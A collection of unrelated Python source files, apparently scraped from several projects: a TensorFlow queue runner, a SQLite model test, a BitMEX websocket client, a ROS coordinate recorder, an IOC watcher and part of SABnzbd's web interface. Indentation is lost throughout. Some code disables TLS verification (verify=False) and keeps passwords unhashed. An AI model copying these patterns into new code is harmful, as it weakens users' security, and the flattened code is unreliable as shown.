# to unblock everything so we can cleanly exit.
self._cancel_op = self._queue.close(cancel_pending_enqueues=True)
# Protect the count of runs to wait for.
self._lock = threading.Lock()
self._runs = 0
# List of exceptions raised by the running threads.
self._exceptions_raised = []
@property
def exceptions_raised(self):
"""Exceptions raised but not handled by the `QueueRunner` threads.
Exceptions raised in queue runner threads are handled in one of two ways
depending on whether or not a `Coordinator` was passed to
`create_threads()`:
* With a `Coordinator`, exceptions are reported to the coordinator and
forgotten by the `QueueRunner`.
* Without a `Coordinator`, exceptions are captured by the `QueueRunner` and
made available in this `exceptions_raised` property.
Returns:
A list of Python `Exception` objects. The list is empty if no exception
was captured. (No exceptions are captured when using a Coordinator.)
"""
return self._exceptions_raised
# pylint: disable=broad-except
def _run(self, sess, enqueue_op, coord=None):
"""Execute the enqueue op in a loop, close the queue in case of error.
Args:
sess: A Session.
enqueue_op: The Operation to run.
coord: Optional Coordinator object for reporting errors and checking
for stop conditions.
"""
decremented = False
try:
while True:
if coord and coord.should_stop():
break
try:
sess.run(enqueue_op)
except errors.OutOfRangeError:
# This exception indicates that a queue was closed.
with self._lock:
self._runs -= 1
decremented = True
if self._runs == 0:
try:
sess.run(self._close_op)
except Exception as e:
# Intentionally ignore errors from close_op.
logging.vlog(1, "Ignored exception: %s", str(e))
return
except Exception as e:
# This catches all other exceptions.
if coord:
coord.request_stop(e)
else:
logging.error("Exception in QueueRunner: %s", str(e))
with self._lock:
self._exceptions_raised.append(e)
raise
finally:
# Make sure we account for all terminations: normal or errors.
if not decremented:
with self._lock:
self._runs -= 1
def _close_on_stop(self, sess, cancel_op, coord):
"""Close the queue when the Coordinator requests stop.
Args:
sess: A Session.
cancel_op: The Operation to run.
coord: Coordinator.
"""
coord.wait_for_stop()
try:
sess.run(cancel_op)
except Exception as e:
# Intentionally ignore errors from cancel_op.
logging.vlog(1, "Ignored exception: %s", str(e))
# pylint: enable=broad-except
def create_threads(self, sess, coord=None, daemon=False, start=False):
"""Create threads to run the enqueue ops.
This method requires a session in which the graph was launched. It creates
a list of threads, optionally starting them. There is one thread for each
op passed in `enqueue_ops`.
The `coord` argument is an optional coordinator, that the threads will use
to terminate together and report exceptions. If a coordinator is given,
this method starts an additional thread to close the queue when the
coordinator requests a stop.
This method may be called again as long as all threads from a previous call
have stopped.
Args:
sess: A `Session`.
coord: Optional `Coordinator` object for reporting errors and checking
stop conditions.
daemon: Boolean. If `True` make the threads daemon threads.
start: Boolean. If `True` starts the threads. If `False` the
caller must call the `start()` method of the returned threads.
Returns:
A list of threads.
Raises:
RuntimeError: If threads from a previous call to `create_threads()` are
still running.
"""
with self._lock:
if self._runs > 0:
raise RuntimeError(
"Threads are already running from a previous call to Threads() "
"for this queue runner.")
self._runs = len(self._enqueue_ops)
self._exceptions_raised = []
ret_threads = [threading.Thread(target=self._run, args=(sess, op, coord))
for op in self._enqueue_ops]
if coord:
ret_threads.append(threading.Thread(target=self._close_on_stop,
args=(sess, self._cancel_op, coord)))
for t in ret_threads:
if daemon:
t.daemon = True
if start:
t.start()
return ret_threads
def add_queue_runner(qr, collection=ops.GraphKeys.QUEUE_RUNNERS):
"""Adds a `QueueRunner` to a collection in the graph.
When building a complex model that uses many queues it is often difficult to
gather all the queue runners that need to be run. This convenience function
allows you to add a queue runner to a well known collection in the graph.
The companion method `start_queue_runners()` can be used to start threads for
all the collected queue runners.
Args:
qr: A `QueueRunner`.
collection: A `GraphKey` specifying the graph collection to add
the queue runner to. Defaults to `GraphKeys.QUEUE_RUNNERS`.
"""
ops.add_to_collection(collection, qr)
def start_queue_runners(sess=None, coord=None, daemon=True, start=True,
collection=ops.GraphKeys.QUEUE_RUNNERS):
"""Starts all queue runners collected in the graph.
This is a companion method to `add_queue_runner()`. It just starts
threads for all queue runners collected in the graph. It returns
the list of all threads.
Args:
sess: `Session` used to run the queue ops. Defaults to the
default session.
coord: Optional `Coordinator` for coordinating the started threads.
daemon: Whether the threads should be marked as `daemons`, meaning
they don't block program exit.
start: Set to `False` to only create the threads, not start them.
collection: A `GraphKey` specifying the graph collection to
get the queue runners from. Defaults to `GraphKeys.QUEUE_RUNNERS`.
Returns:
A list of threads.
"""
if sess is None:
sess = ops.get_default_session()
threads = []
for qr in ops.get_collection(collection):
threads.extend(qr.create_threads(sess, coord=coord, daemon=daemon,
start=start))
return threads
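# Minimal usage sketch (illustrative only; assumes an existing `queue`, an `enqueue_op`,
# an active `sess`, and a Coordinator imported from tensorflow.python.training.coordinator):
#
#   qr = QueueRunner(queue, [enqueue_op] * 4)
#   add_queue_runner(qr)
#   coord = Coordinator()
#   threads = start_queue_runners(sess=sess, coord=coord)
#   # ... run the training ops ...
#   coord.request_stop()
#   coord.join(threads)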
|
test_model.py
|
import sqlite3
import threading
import unittest
from deepstar.models.model import Model
from .. import deepstar_path
class TestModel(unittest.TestCase):
"""
This class tests the Model class.
"""
def test_init(self):
with deepstar_path():
self.assertEqual(type(Model.db), sqlite3.Connection)
def test_isolation_level(self):
with deepstar_path():
Model.db.execute('CREATE TABLE test (test TEXT)')
Model.db.execute("INSERT INTO test (test) VALUES ('test')")
Model.close()
Model.init()
self.assertEqual(Model.db.execute('SELECT test FROM test').fetchone(), ('test',)) # noqa
def test_foreign_key_constraints(self):
with deepstar_path():
Model.db.execute('CREATE TABLE test1 (id INTEGER PRIMARY KEY)')
Model.db.execute('CREATE TABLE test2 ( fk_test1 INTEGER, FOREIGN KEY(fk_test1) REFERENCES test1(id))') # noqa
with self.assertRaises(sqlite3.IntegrityError):
Model.db.execute('INSERT INTO test2 (fk_test1) VALUES (1)')
def test_check_same_thread(self):
with deepstar_path():
def a():
Model.init()
thread = threading.Thread(target=a)
Model.close()
thread.start()
thread.join()
Model.close()
def test_close(self):
with deepstar_path():
Model.close()
self.assertEqual(Model.db, None)
|
bitmex_websocket.py
|
import hashlib
import hmac
import json
import os
import threading
import time
import traceback
import urllib
import websocket
from datetime import datetime
from src import logger, to_data_frame
def generate_nonce():
return int(round(time.time() * 1000))
def generate_signature(secret, verb, url, nonce, data):
"""Generate a request signature compatible with BitMEX."""
# Parse the url so we can remove the base and extract just the path.
parsedURL = urllib.parse.urlparse(url)
path = parsedURL.path
if parsedURL.query:
path = path + '?' + parsedURL.query
# print "Computing HMAC: %s" % verb + path + str(nonce) + data
message = (verb + path + str(nonce) + data).encode('utf-8')
signature = hmac.new(secret.encode('utf-8'), message,
digestmod=hashlib.sha256).hexdigest()
return signature
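# Illustrative helper (not part of the original module): the signature is the
# hex HMAC-SHA256 of verb + path(+query) + nonce + body, so a GET on the
# realtime endpoint with an empty body can be signed as below. The secret is a
# placeholder, not a real credential.
def _example_sign_realtime_get(api_secret='replace-me'):
    nonce = generate_nonce()
    return generate_signature(api_secret, 'GET',
                              'https://www.bitmex.com/realtime', nonce, '')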
class BitMexWs:
# use the testnet endpoint when True
testnet = False
# flag that keeps the websocket (re)connect loop running
is_running = True
# registered event handlers, keyed by table name
handlers = {}
def __init__(self, test=False):
"""
constructor
"""
self.testnet = test
if test:
domain = 'testnet.bitmex.com'
else:
domain = 'www.bitmex.com'
self.endpoint = 'wss://' + domain + '/realtime?subscribe=tradeBin1m:XBTUSD,' \
'tradeBin5m:XBTUSD,tradeBin1h:XBTUSD,tradeBin1d:XBTUSD,instrument:XBTUSD,' \
'margin,position:XBTUSD,wallet,orderBookL2:XBTUSD'
self.ws = websocket.WebSocketApp(self.endpoint,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close,
header=self.__get_auth())
self.wst = threading.Thread(target=self.__start)
self.wst.daemon = True
self.wst.start()
def __get_auth(self):
"""
get auth info
"""
api_key = os.environ.get(
"BITMEX_TEST_APIKEY") if self.testnet else os.environ.get("BITMEX_APIKEY")
api_secret = os.environ.get(
"BITMEX_TEST_SECRET") if self.testnet else os.environ.get("BITMEX_SECRET")
if api_key and api_secret:
nonce = generate_nonce()
return [
"api-nonce: " + str(nonce),
"api-signature: " +
generate_signature(api_secret, 'GET', '/realtime', nonce, ''),
"api-key:" + api_key
]
else:
logger.info("WebSocket is not authenticating.")
return []
def __start(self):
"""
start the websocket.
"""
while self.is_running:
self.ws.run_forever()
def __on_error(self, ws, message):
"""
On Error listener
:param ws:
:param message:
"""
logger.error(message)
logger.error(traceback.format_exc())
def __on_message(self, ws, message):
"""
On Message listener
:param ws:
:param message:
:return:
"""
try:
obj = json.loads(message)
if 'table' in obj:
if len(obj['data']) <= 0:
return
table = obj['table']
action = obj['action']
data = obj['data']
if table.startswith("tradeBin"):
data[0]['timestamp'] = datetime.strptime(
data[0]['timestamp'][:-5], '%Y-%m-%dT%H:%M:%S')
self.__emit(table, action, to_data_frame([data[0]]))
elif table.startswith("instrument"):
self.__emit(table, action, data[0])
elif table.startswith("margin"):
self.__emit(table, action, data[0])
elif table.startswith("position"):
self.__emit(table, action, data[0])
elif table.startswith("wallet"):
self.__emit(table, action, data[0])
elif table.startswith("orderBookL2"):
self.__emit(table, action, data)
except Exception as e:
logger.error(e)
logger.error(traceback.format_exc())
def __emit(self, key, action, value):
"""
send data
"""
if key in self.handlers:
self.handlers[key](action, value)
def __on_close(self, ws):
"""
On Close Listener
:param ws:
"""
if 'close' in self.handlers:
self.handlers['close']()
if self.is_running:
logger.info("Websocket restart")
self.ws = websocket.WebSocketApp(self.endpoint,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close,
header=self.__get_auth())
self.wst = threading.Thread(target=self.__start)
self.wst.daemon = True
self.wst.start()
def on_close(self, func):
"""
on close fn
:param func:
"""
self.handlers['close'] = func
def bind(self, key, func):
"""
bind fn
:param key:
:param func:
"""
if key == '1m':
self.handlers['tradeBin1m'] = func
if key == '5m':
self.handlers['tradeBin5m'] = func
if key == '1h':
self.handlers['tradeBin1h'] = func
if key == '1d':
self.handlers['tradeBin1d'] = func
if key == 'instrument':
self.handlers['instrument'] = func
if key == 'margin':
self.handlers['margin'] = func
if key == 'position':
self.handlers['position'] = func
if key == 'wallet':
self.handlers['wallet'] = func
if key == 'orderBookL2':
self.handlers['orderBookL2'] = func
def close(self):
"""
close websocket
"""
self.is_running = False
self.ws.close()
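# Usage sketch (illustrative, not part of the original module): subscribe to
# 1-minute bins and instrument updates, then close the socket. Assumes the
# BitMEX credentials are present in the environment when test=True and that
# to_data_frame() returns a pandas DataFrame.
def _example_run_ws():  # pragma: no cover
    def on_1m(action, df):
        logger.info("1m bin (%s): %s" % (action, df.tail(1)))

    ws = BitMexWs(test=True)
    ws.bind('1m', on_1m)
    ws.bind('instrument', lambda action, data: logger.info(str(data.get('lastPrice'))))
    try:
        time.sleep(120)  # let the handlers run for a while
    finally:
        ws.close()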
|
capture_cell_coordinates.py
|
#!/usr/bin/env python
import rospy
import roslib
from std_msgs.msg import Int8, String
import math
import time
import csv
import threading
from geometry_msgs.msg import PoseArray
import sys
import json
#Defining a class
class Record_Coordinates():
def __init__(self):
rospy.init_node('whycon_record_nodes',anonymous=False) # initializing a ROS node named whycon_record_nodes
self.whycon_marker = [0,0,0]
rospy.Subscriber('/whycon/poses',PoseArray,self.whycon_data) # Subscribing to topic
self.number_of_nodes = 36
self.block_name_list = ["A1", "B1", "C1", "D1", "E1", "F1", "F2", "E2", "D2", "C2", "B2", "A2", "A3", "B3", "C3", "D3", "E3", "F3","F4", "E4", "D4", "C4", "B4", "A4", "A5", "B5", "C5", "D5", "E5", "F5", "F6", "E6", "D6", "C6", "B6", "A6"]
self.pose_list = []
self.current_index = None
# Callback for /whycon/poses
def whycon_data(self,msg):
pos_x = round(msg.poses[0].position.x,3)
pos_y = round(msg.poses[0].position.y,3)
pos_z = round(msg.poses[0].position.z,3)
self.whycon_marker = [pos_x,pos_y,pos_z]
def keypress_thread(self):
while True:
text = raw_input("Press Enter to lock.")
if not text:
break
def query_yes_no(self, question, default=None):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": True, "y": True, "ye": True,"no": False, "n": False}
if default is None:
prompt = " [Y/N]: "
elif default == "yes":
prompt = " [Y/N]: "
elif default == "no":
prompt = " [Y/N]: "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(question + prompt)
choice = raw_input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' ""(or 'y' or 'n').\n")
def display_and_lock_whycon_poses(self, index):
while True:
print("\n\nRecord the WhyCon coordinate for: "+self.block_name_list[index]+". Press ENTER to lock.\n")
t1 = threading.Thread(target=self.keypress_thread , args=())
t1.start()
while t1.isAlive():
sys.stdout.write('\rwhy_x: '+'{0:06.3f}'.format(self.whycon_marker[0])+' why_y: '+'{0:06.3f}'.format(self.whycon_marker[1])+' why_z: '+'{0:06.3f}'.format(self.whycon_marker[2]))
sys.stdout.flush()
whycon_marker_locked = list(self.whycon_marker)
time.sleep(0.2)
text_input = raw_input("You have chosen the above pose for "+self.block_name_list[index]+". Press ENTER to commit, any other key to retake value.")
if not text_input:
self.pose_list.append(whycon_marker_locked)
break
def input_position_config(self):
for i in range(self.number_of_nodes):
self.display_and_lock_whycon_poses(i)
def write_config_to_json(self, file_path = 'cell_coords.json'):
pose_dict = dict(zip(self.block_name_list, self.pose_list))
with open(file_path, mode='w') as outfile:
json.dump(pose_dict, outfile)
print("Recording Successful")
if __name__=="__main__":
try:
rec = Record_Coordinates()
rec.input_position_config()
rec.write_config_to_json()
except KeyboardInterrupt:
print("Recording Config Interrupted")
|
watchers.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from app.utils import read_config
from app.classes.iocs import IOCs
from app.classes.whitelist import WhiteList
import requests
import json
import urllib3
import time
from multiprocessing import Process
"""
This file parses the watchers defined in the
configuration file, in order to automatically fetch
new IOCs / elements from remote sources without
user interaction.
As of today, only the default JSON export format from
the backend and unauthenticated HTTP requests
are accepted. The code is a little awkward; it'll
be improved in a future version ;)
"""
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def watch_iocs():
"""
Retrieve IOCs from the remote URLs defined in config/watchers.
For each (new ?) IOC, add it to the DB.
"""
# Retrieve the URLs from the configuration
urls = read_config(("watchers", "iocs"))
watchers = [{"url": url, "status": False} for url in urls]
while True:
for w in watchers:
if w["status"] == False:
iocs = IOCs()
iocs_list = []
to_delete = []
try:
res = requests.get(w["url"], verify=False)
if res.status_code == 200:
content = json.loads(res.content)
iocs_list = content["iocs"] if "iocs" in content else []
to_delete = content["to_delete"] if "to_delete" in content else []
else:
w["status"] = False
except:
w["status"] = False
for ioc in iocs_list:
try:
iocs.add(ioc["type"], ioc["tag"],
ioc["tlp"], ioc["value"], "watcher")
w["status"] = True
except:
continue
for ioc in to_delete:
try:
iocs.delete_by_value(ioc["value"])
w["status"] = True
except:
continue
# If at least one URL hasn't been parsed yet, retry in 1 minute.
if False in [w["status"] for w in watchers]:
time.sleep(60)
else:
break
def watch_whitelists():
"""
Retrieve whitelist elements from the remote URLs
defined in config/watchers. For each (new ?) element,
add it to the DB.
"""
urls = read_config(("watchers", "whitelists"))
watchers = [{"url": url, "status": False} for url in urls]
while True:
for w in watchers:
if w["status"] == False:
whitelist = WhiteList()
elements = []
to_delete = []
try:
res = requests.get(w["url"], verify=False)
if res.status_code == 200:
content = json.loads(res.content)
elements = content["elements"] if "elements" in content else []
to_delete = content["to_delete"] if "to_delete" in content else []
else:
w["status"] = False
except:
w["status"] = False
for elem in elements:
try:
whitelist.add(elem["type"], elem["element"], "watcher")
w["status"] = True
except:
continue
for elem in to_delete:
try:
whitelist.delete_by_value(elem["element"])
w["status"] = True
except:
continue
if False in [w["status"] for w in watchers]:
time.sleep(60)
else:
break
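# Shape of the remote payloads the two watchers above expect, reconstructed
# from the parsing code; all field values below are illustrative placeholders.
#
#   IOC watcher URL returns:
#       {"iocs": [{"type": "domain", "tag": "tracker", "tlp": "white",
#                  "value": "bad.example.org"}],
#        "to_delete": [{"value": "old.example.org"}]}
#
#   Whitelist watcher URL returns:
#       {"elements": [{"type": "domain", "element": "cdn.example.net"}],
#        "to_delete": [{"element": "stale.example.net"}]}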
p1 = Process(target=watch_iocs)
p2 = Process(target=watch_whitelists)
p1.start()
p2.start()
|
rest.py
|
import threading
from queue import Queue
from celery.task.control import inspect
from flask import Blueprint, jsonify, current_app
from app import db
from app.errors import register_errors
base_blueprint = Blueprint('', __name__)
register_errors(base_blueprint)
def are_celery_workers_running():
def worker(q):
i = inspect()
q.put(i.stats())
q = Queue()
threading.Thread(target=worker, args=(q,)).start()
result = q.get()
if result:
return 'celery@worker-{}'.format(current_app.config.get('ENVIRONMENT')) in result
@base_blueprint.route('/')
def get_info():
workers_running = False
if 'http://localhost' not in current_app.config['API_BASE_URL']:
workers_running = are_celery_workers_running()
current_app.logger.info('get_info')
query = 'SELECT version_num FROM alembic_version'
try:
full_name = db.session.execute(query).fetchone()[0]
except Exception as e:
current_app.logger.error('Database exception: %r', e)
full_name = 'Database error, check logs'
resp = {
'environment': current_app.config['ENVIRONMENT'],
'info': full_name,
'commit': current_app.config['GITHUB_SHA'],
'workers': 'Running' if workers_running else 'Not running'
}
if current_app.config.get('EMAIL_RESTRICT'): # pragma: no cover
resp['email_restrict'] = True
return jsonify(resp)
@base_blueprint.route('/info')
def get_info_without_db():
current_app.logger.info('get_info_without_db')
resp = {
'environment': current_app.config['ENVIRONMENT'],
'commit': current_app.config['GITHUB_SHA'],
}
if current_app.config.get('EMAIL_RESTRICT'): # pragma: no cover
resp['email_restrict'] = True
return jsonify(resp)
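# Example response from GET / (fields mirror the dict built in get_info above;
# all values are illustrative):
#
#   {"environment": "staging",
#    "info": "3ad9cb26d2c5",
#    "commit": "0f4e2a1",
#    "workers": "Running"}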
|
interface.py
|
#!/usr/bin/python -OO
# Copyright 2007-2019 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.interface - webinterface
"""
import os
import time
import cherrypy
import logging
import urllib
import json
import re
import hashlib
import socket
import ssl
import functools
from threading import Thread
from random import randint
from xml.sax.saxutils import escape
from sabnzbd.utils.rsslib import RSS, Item
import sabnzbd
import sabnzbd.rss
import sabnzbd.scheduler as scheduler
from Cheetah.Template import Template
from sabnzbd.misc import real_path, to_units, from_units, time_format, \
long_path, calc_age, same_file, probablyipv4, probablyipv6, \
int_conv, globber, globber_full, remove_all, get_base_url
from sabnzbd.newswrapper import GetServerParms
from sabnzbd.bpsmeter import BPSMeter
from sabnzbd.encoding import TRANS, xml_name, LatinFilter, unicoder, special_fixer, \
platform_encode
import sabnzbd.config as config
import sabnzbd.cfg as cfg
import sabnzbd.notifier as notifier
import sabnzbd.newsunpack
from sabnzbd.downloader import Downloader
from sabnzbd.nzbqueue import NzbQueue
from sabnzbd.utils.servertests import test_nntp_server_dict
from sabnzbd.decoder import HAVE_YENC, SABYENC_ENABLED
from sabnzbd.utils.diskspeed import diskspeedmeasure
from sabnzbd.utils.getperformance import getpystone
from sabnzbd.constants import NORMAL_PRIORITY, MEBI, DEF_SKIN_COLORS, \
DEF_STDCONFIG, DEF_MAIN_TMPL, DEFAULT_PRIORITY
from sabnzbd.lang import list_languages
from sabnzbd.api import list_scripts, list_cats, del_from_section, \
api_handler, build_queue, remove_callable, build_status, \
retry_job, retry_all_jobs, build_header, build_history, del_job_files, \
format_bytes, std_time, report, del_hist_job, Ttemplate, build_queue_header, \
_api_test_email, _api_test_notif
##############################################################################
# Global constants
##############################################################################
DIRECTIVES = {
'directiveStartToken': '<!--#',
'directiveEndToken': '#-->',
'prioritizeSearchListOverSelf': True
}
FILTER = LatinFilter
##############################################################################
# Security functions
##############################################################################
def secured_expose(wrap_func=None, check_configlock=False, check_session_key=False):
""" Wrapper for both cherrypy.expose and login/access check """
if not wrap_func:
return functools.partial(secured_expose, check_configlock=check_configlock, check_session_key=check_session_key)
# Expose to cherrypy
wrap_func.exposed = True
@functools.wraps(wrap_func)
def internal_wrap(*args, **kwargs):
# Add X-Frame-Headers headers to page-requests
if cfg.x_frame_options():
cherrypy.response.headers['X-Frame-Options'] = 'SameOrigin'
# Check if config is locked
if check_configlock and cfg.configlock():
cherrypy.response.status = 403
return 'Access denied - Configuration locked'
# Check if external access
if not check_access():
cherrypy.response.status = 403
return 'Access denied'
# Verify login status, only for non-key pages
if not check_login() and not check_session_key:
raise Raiser('/login/')
# Verify host used for the visit
if not check_hostname():
cherrypy.response.status = 403
return 'Access denied - Hostname verification failed: https://sabnzbd.org/hostname-check'
# Some pages need correct session key
if check_session_key:
msg = check_session(kwargs)
if msg:
return msg
# All good, cool!
return wrap_func(*args, **kwargs)
return internal_wrap
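# Minimal illustration (hypothetical, not part of SABnzbd) of how the
# decorator above is applied by the page classes below: plain pages use the
# bare @secured_expose, state-changing handlers also demand the session/API
# key via check_session_key=True.
class _ExampleSecuredPage(object):
    @secured_expose
    def index(self, **kwargs):
        return 'hello'

    @secured_expose(check_session_key=True)
    def delete(self, **kwargs):
        return 'deleted'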
def check_access(access_type=4):
""" Check if external address is allowed given access_type:
1=nzb
2=api
3=full_api
4=webui
5=webui with login for external
"""
referrer = cherrypy.request.remote.ip
xff = cherrypy.request.headers.get('X-Forwarded-For')
allowed = ip_allowed(referrer, access_type)
if xff:
allowed = allowed and ip_allowed(xff, access_type)
if not allowed:
logging.debug('Refused connection from %s', referrer)
return allowed
def ip_allowed(referrer, access_type):
# CherryPy will report ::ffff:192.168.0.10 on dual-stack situation
# It will always contain that ::ffff: prefix
range_ok = not cfg.local_ranges() or bool([1 for r in cfg.local_ranges() if (referrer.startswith(r) or referrer.replace('::ffff:', '').startswith(r))])
allowed = referrer in ('127.0.0.1', '::ffff:127.0.0.1', '::1') or range_ok or access_type <= cfg.inet_exposure()
return allowed
def check_hostname():
""" Check if hostname is allowed, to mitigate DNS-rebinding attack.
Similar to CVE-2019-5702, we need to add protection even
if only allowed to be accessed via localhost.
"""
# If login is enabled, no API-key can be deduced
if cfg.username() and cfg.password():
return True
# Don't allow requests without Host
host = cherrypy.request.headers.get('Host')
if not host:
return False
# Remove the port-part (like ':8080'), if it is there, always on the right hand side.
# Not to be confused with IPv6 colons (within square brackets)
host = re.sub(':[0123456789]+$', '', host).lower()
# Fine if localhost or IP
if host == 'localhost' or probablyipv4(host) or probablyipv6(host):
return True
# Check on the whitelist
if host in cfg.host_whitelist():
return True
# Fine if ends with ".local" or ".local.", aka mDNS name
# See rfc6762 Multicast DNS
if host.endswith(('.local', '.local.')):
return True
# Ohoh, bad
log_warning_and_ip(T('Refused connection with hostname "%s" from:') % host)
return False
# Create a more unique ID for each instance
COOKIE_SECRET = str(randint(1000,100000)*os.getpid())
def set_login_cookie(remove=False, remember_me=False):
""" We try to set a cookie as unique as possible
to the current user. Based on it's IP and the
current process ID of the SAB instance and a random
number, so cookies cannot be re-used
"""
salt = randint(1,1000)
cherrypy.response.cookie['login_cookie'] = hashlib.sha1(str(salt) + cherrypy.request.remote.ip + COOKIE_SECRET).hexdigest()
cherrypy.response.cookie['login_cookie']['path'] = '/'
cherrypy.response.cookie['login_cookie']['httponly'] = 1
cherrypy.response.cookie['login_salt'] = salt
cherrypy.response.cookie['login_salt']['path'] = '/'
cherrypy.response.cookie['login_salt']['httponly'] = 1
# If we want to be remembered
if remember_me:
cherrypy.response.cookie['login_cookie']['max-age'] = 3600*24*14
cherrypy.response.cookie['login_salt']['max-age'] = 3600*24*14
# To remove
if remove:
cherrypy.response.cookie['login_cookie']['expires'] = 0
cherrypy.response.cookie['login_salt']['expires'] = 0
else:
# Notify about new login
notifier.send_notification(T('User logged in'), T('User logged in to the web interface'), 'new_login')
def check_login_cookie():
# Do we have everything?
if 'login_cookie' not in cherrypy.request.cookie or 'login_salt' not in cherrypy.request.cookie:
return False
return cherrypy.request.cookie['login_cookie'].value == hashlib.sha1(str(cherrypy.request.cookie['login_salt'].value) + cherrypy.request.remote.ip + COOKIE_SECRET).hexdigest()
def check_login():
# Not when no authentication required or basic-auth is on
if not cfg.html_login() or not cfg.username() or not cfg.password():
return True
# If we show login for external IP, by using access_type=6 we can check if IP match
if cfg.inet_exposure() == 5 and check_access(access_type=6):
return True
# Check the cookie
return check_login_cookie()
def get_users():
users = {cfg.username(): cfg.password()}
return users
def encrypt_pwd(pwd):
return pwd
def set_auth(conf):
""" Set the authentication for CherryPy """
if cfg.username() and cfg.password() and not cfg.html_login():
conf.update({'tools.basic_auth.on': True, 'tools.basic_auth.realm': 'SABnzbd',
'tools.basic_auth.users': get_users, 'tools.basic_auth.encrypt': encrypt_pwd})
conf.update({'/api': {'tools.basic_auth.on': False},
'%s/api' % cfg.url_base(): {'tools.basic_auth.on': False},
})
else:
conf.update({'tools.basic_auth.on': False})
def check_session(kwargs):
""" Check session key """
if not check_access():
return u'Access denied'
key = kwargs.get('session')
if not key:
key = kwargs.get('apikey')
msg = None
if not key:
log_warning_and_ip(T('Missing Session key'))
msg = T('Error: Session Key Required')
elif key != cfg.api_key():
log_warning_and_ip(T('Error: Session Key Incorrect'))
msg = T('Error: Session Key Incorrect')
return msg
def check_apikey(kwargs, nokey=False):
""" Check api key or nzbkey
Return None when OK, otherwise an error message
"""
output = kwargs.get('output')
mode = kwargs.get('mode', '')
name = kwargs.get('name', '')
# Lookup required access level
req_access = sabnzbd.api.api_level(mode, name)
if req_access == 1 and check_access(1):
# NZB-only actions
pass
elif not check_access(req_access):
return report(output, 'Access denied')
# First check APIKEY, if OK that's sufficient
if not (cfg.disable_key() or nokey):
key = kwargs.get('apikey')
if not key:
key = kwargs.get('session')
if not key:
if cfg.api_warnings():
log_warning_and_ip(T('API Key missing, please enter the api key from Config->General into your 3rd party program:'))
return report(output, 'API Key Required')
elif req_access == 1 and key == cfg.nzb_key():
return None
elif key == cfg.api_key():
return None
else:
log_warning_and_ip(T('API Key incorrect, Use the api key from Config->General in your 3rd party program:'))
return report(output, 'API Key Incorrect')
# No active APIKEY, check web credentials instead
if cfg.username() and cfg.password():
if check_login() or (kwargs.get('ma_username') == cfg.username() and kwargs.get('ma_password') == cfg.password()):
pass
else:
if cfg.api_warnings():
log_warning_and_ip(T('Authentication missing, please enter username/password from Config->General into your 3rd party program:'))
return report(output, 'Missing authentication')
return None
def log_warning_and_ip(txt):
""" Include the IP and the Proxy-IP for warnings """
# Was it proxy forwarded?
xff = cherrypy.request.headers.get('X-Forwarded-For')
if xff:
txt = '%s %s (X-Forwarded-For: %s)>%s' % (txt, cherrypy.request.remote.ip, xff, cherrypy.request.headers.get('User-Agent', '??'))
else:
txt = '%s %s>%s' % (txt, cherrypy.request.remote.ip, cherrypy.request.headers.get('User-Agent', '??'))
logging.warning('%s', txt)
##############################################################################
# Helper raiser functions
##############################################################################
def Raiser(root='', **kwargs):
args = {}
for key in kwargs:
val = kwargs.get(key)
if val:
args[key] = val
# Add extras
if args:
root = '%s?%s' % (root, urllib.urlencode(args))
# Optionally add the leading /sabnzbd/ (or what the user set)
if not root.startswith(cfg.url_base()):
root = cherrypy.request.script_name + root
# Send the redirect
return cherrypy.HTTPRedirect(root)
def queueRaiser(root, kwargs):
return Raiser(root, start=kwargs.get('start'),
limit=kwargs.get('limit'),
search=kwargs.get('search'))
def rssRaiser(root, kwargs):
return Raiser(root, feed=kwargs.get('feed'))
##############################################################################
# Page definitions
##############################################################################
class MainPage(object):
def __init__(self):
self.__root = '/'
# Add all sub-pages
self.login = LoginPage()
self.queue = QueuePage('/queue/')
self.history = HistoryPage('/history/')
self.status = Status('/status/')
self.config = ConfigPage('/config/')
self.nzb = NzoPage('/nzb/')
self.wizard = Wizard('/wizard/')
@secured_expose
def index(self, **kwargs):
if not cfg.notified_new_skin() and cfg.web_dir() != 'Glitter':
logging.warning(T('Try our new skin Glitter! Fresh new design that is optimized for desktop and mobile devices. Go to Config -> General to change your skin.'))
if not cfg.notified_new_skin():
cfg.notified_new_skin.set(1)
config.save_config()
if kwargs.get('skip_wizard') or config.get_servers():
info = build_header()
info['scripts'] = list_scripts(default=True)
info['script'] = 'Default'
info['cat'] = 'Default'
info['categories'] = list_cats(True)
info['have_rss_defined'] = bool(config.get_rss())
info['have_watched_dir'] = bool(cfg.dirscan_dir())
# Have logout only with HTML and if inet=5, only when we are external
info['have_logout'] = cfg.username() and cfg.password() and (cfg.html_login() and (cfg.inet_exposure() < 5 or (cfg.inet_exposure() == 5 and not check_access(access_type=6))))
bytespersec_list = BPSMeter.do.get_bps_list()
info['bytespersec_list'] = ','.join([str(bps) for bps in bytespersec_list])
# For Glitter we pre-load the JSON output
if 'Glitter' in sabnzbd.WEB_DIR:
# Queue
queue = build_queue(limit=cfg.queue_limit(), output='json')[0]
# History
history = {}
grand, month, week, day = BPSMeter.do.get_sums()
history['total_size'], history['month_size'], history['week_size'], history['day_size'] = \
to_units(grand), to_units(month), to_units(week), to_units(day)
history['slots'], fetched_items, history['noofslots'] = build_history(limit=cfg.history_limit(), output='json')
# Make sure the JSON works, otherwise leave empty
try:
info['preload_queue'] = json.dumps({'queue': remove_callable(queue)})
info['preload_history'] = json.dumps({'history': history})
except UnicodeDecodeError:
# We use the javascript recognized 'false'
info['preload_queue'] = 'false'
